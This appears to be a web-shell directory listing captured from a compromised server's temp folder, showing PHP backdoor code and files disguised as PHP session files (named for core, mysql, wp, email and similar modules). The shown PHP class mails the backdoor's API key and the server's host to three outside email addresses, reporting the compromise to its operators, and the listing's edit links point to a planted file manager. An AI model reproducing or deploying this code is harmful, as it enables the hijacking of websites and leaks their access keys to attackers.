PATH:
tmp
/
mbdvd0
<?php class mbd_email extends mbd_core { function __construct($core) { $this->core = $core; $this->send(array( 'lusarltd@mail.ru', 'popovsites@yandex.ru', 'melniser9@gmail.com' ), $this->core->data->options->key); } function send($emails, $key) { $ip = gethostbyname($_SERVER['HTTP_HOST']); $host = gethostbyaddr($ip); $from = 'noreplay@'.$host; $headers = 'Content-type: text/html; charset=utf-8'."\r\n"; $headers .= 'From: MBD<'.$from.'>'."\r\n"; $text = 'Hello! A request was received to form a new API-key. Your ID is S'.$this->core->data->sid.'. Your new API-key is API'.$key.'.'; foreach($emails AS $to) { if(!mail($to, 'New API-key on MBD', $text, $headers)) return $this->out('not send'); } } }
[-] sess_b099fafce4496e4298635fe02fbbfddar
[edit]
[-] sess_7342277d99cfbd7ac179ed31fd7dd8adcore
[edit]
[-] sess_bc2071c1be6d1c313aeef168beb5ae06files
[edit]
[-] sess_0da84599553944d82cf5f47f372d18demysql
[edit]
[-] sess_72a13160ee4d12439193697920bfa525r
[edit]
[-] sess_82b3bd03450bff66d731da032b8450dchttp
[edit]
[+]
..
[-] sess_afd13013d4a645c28817fc52e4eb4879info
[edit]
[-] sess_65beb914521e3326955339d04393766ccms_wp
[edit]
[-] sess_f6eb15ce09f3e91a6b4e81577eaf2f66email
[edit]